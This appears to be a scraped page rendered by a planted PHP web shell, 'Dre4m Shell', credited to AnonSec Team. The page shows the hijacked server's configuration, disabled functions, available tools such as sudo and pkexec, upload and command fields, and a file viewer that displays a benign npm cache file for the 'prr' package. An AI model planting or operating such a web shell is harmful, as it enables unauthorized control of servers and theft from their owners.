Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 3.141.35.52
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/ubuntu/.npm/registry.npmjs.org/prr/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/ubuntu/.npm/registry.npmjs.org/prr/.cache.json
{"_id":"prr","_rev":"8-f95632b8c11e433840694a6124d7a71e","name":"prr","description":"A better Object.defineProperty()","dist-tags":{"latest":"1.0.1"},"versions":{"0.0.0":{"name":"prr","description":"A better Object.defineProperty()","version":"0.0.0","homepage":"https://github.com/rvagg/prr","authors":["Rod Vagg <rod@vagg.org> (https://github.com/rvagg)"],"keywords":["property","properties","defineProperty","ender"],"main":"./prr.js","repository":{"type":"git","url":"https://github.com/rvagg/prr.git"},"dependencies":{},"devDependencies":{"tap":"*"},"scripts":{"test":"node ./test.js"},"license":"MIT","_id":"prr@0.0.0","dist":{"shasum":"1a84b85908325501411853d0081ee3fa86e2926a","tarball":"https://registry.npmjs.org/prr/-/prr-0.0.0.tgz"},"_from":".","_npmVersion":"1.2.15","_npmUser":{"name":"rvagg","email":"rod@vagg.org"},"maintainers":[{"name":"rvagg","email":"rod@vagg.org"}],"directories":{}},"1.0.0":{"name":"prr","description":"A better Object.defineProperty()","version":"1.0.0","homepage":"https://github.com/rvagg/prr","author":{"name":"Rod Vagg","email":"rod@vagg.org","url":"https://github.com/rvagg"},"keywords":["property","properties","defineProperty","ender"],"main":"./prr.js","repository":{"type":"git","url":"https://github.com/rvagg/prr.git"},"dependencies":{},"devDependencies":{"tap":"*"},"scripts":{"test":"node ./test.js"},"license":"MIT","gitHead":"1e29e003b01b3ce877c2b81f2dd0b102a789aa06","bugs":{"url":"https://github.com/rvagg/prr/issues"},"_id":"prr@1.0.0","_shasum":"1301fbed1f9f92414e988eda0c0afdb85ae9d402","_from":".","_npmVersion":"1.4.14","_npmUser":{"name":"rvagg","email":"rod@vagg.org"},"maintainers":[{"name":"rvagg","email":"rod@vagg.org"}],"dist":{"shasum":"1301fbed1f9f92414e988eda0c0afdb85ae9d402","tarball":"https://registry.npmjs.org/prr/-/prr-1.0.0.tgz"},"directories":{}},"1.0.1":{"name":"prr","description":"A better Object.defineProperty()","version":"1.0.1","homepage":"https://github.com/rvagg/prr","author":{"name":"Rod Vagg","email":"rod@vagg.org","url":"https://github.com/rvagg"},"keywords":["property","properties","defineProperty","ender"],"main":"./prr.js","repository":{"type":"git","url":"https://github.com/rvagg/prr.git"},"dependencies":{},"devDependencies":{"tap":"*"},"scripts":{"test":"node ./test.js"},"license":"MIT","gitHead":"b69ba0edc7aacbda0c98d550579e452b8597c126","bugs":{"url":"https://github.com/rvagg/prr/issues"},"_id":"prr@1.0.1","_shasum":"d3fc114ba06995a45ec6893f484ceb1d78f5f476","_from":".","_npmVersion":"1.4.14","_npmUser":{"name":"rvagg","email":"rod@vagg.org"},"maintainers":[{"name":"rvagg","email":"rod@vagg.org"}],"dist":{"shasum":"d3fc114ba06995a45ec6893f484ceb1d78f5f476","tarball":"https://registry.npmjs.org/prr/-/prr-1.0.1.tgz"},"directories":{}}},"readme":"# prr [![Build Status](https://secure.travis-ci.org/rvagg/prr.png)](http://travis-ci.org/rvagg/prr)\n\nAn sensible alternative to `Object.defineProperty()`. Available in npm and Ender as **prr**.\n\n## Usage\n\nSet the property `'foo'` (`obj.foo`) to have the value `'bar'` with default options (`'enumerable'`, `'configurable'` and `'writable'` are all `false`):\n\n```js\nprr(obj, 'foo', 'bar')\n```\n\nAdjust the default options:\n\n```js\nprr(obj, 'foo', 'bar', { enumerable: true, writable: true })\n```\n\nDo the same operation for multiple properties:\n\n```js\nprr(obj, { one: 'one', two: 'two' })\n// or with options:\nprr(obj, { one: 'one', two: 'two' }, { enumerable: true, writable: true })\n```\n\n### Simplify!\n\nBut obviously, having to write out the full options object makes it nearly as bad as the original `Object.defineProperty()` so we can simplify.\n\nAs an alternative method we can use an options string where each character represents a option: `'e'=='enumerable'`, `'c'=='configurable'` and `'w'=='writable'`:\n\n```js\nprr(obj, 'foo', 'bar', 'ew') // enumerable and writable but not configurable\n// muliple properties:\nprr(obj, { one: 'one', two: 'two' }, 'ewc') // configurable too\n```\n\n## Where can I use it?\n\nAnywhere! For pre-ES5 environments *prr* will simply fall-back to an `object[property] = value` so you can get close to what you want.\n\n*prr* is Ender-compatible so you can include it in your Ender build and `$.prr(...)` or `var prr = require('prr'); prr(...)`.\n\n## Licence\n\nprr is Copyright (c) 2013 Rod Vagg [@rvagg](https://twitter.com/rvagg) and licensed under the MIT licence. All rights not explicitly granted in the MIT license are reserved. See the included LICENSE.md file for more details.\n","maintainers":[{"name":"rvagg","email":"rod@vagg.org"}],"time":{"modified":"2017-01-08T05:15:41.845Z","created":"2013-04-01T17:21:27.562Z","0.0.0":"2013-04-01T17:21:30.886Z","1.0.0":"2014-06-29T07:19:44.640Z","1.0.1":"2014-07-22T06:50:49.598Z"},"repository":{"type":"git","url":"https://github.com/rvagg/prr.git"},"homepage":"https://github.com/rvagg/prr","keywords":["property","properties","defineProperty","ender"],"author":{"name":"Rod Vagg","email":"rod@vagg.org","url":"https://github.com/rvagg"},"bugs":{"url":"https://github.com/rvagg/prr/issues"},"license":"MIT","readmeFilename":"README.md","users":{"tungv":true},"_attachments":{},"_etag":"\"5871cafd-1426\"","_lastModified":"Sun, 8 Jan 2017 5:15:41 GMT"}

Anon7 - 2022
AnonSec Team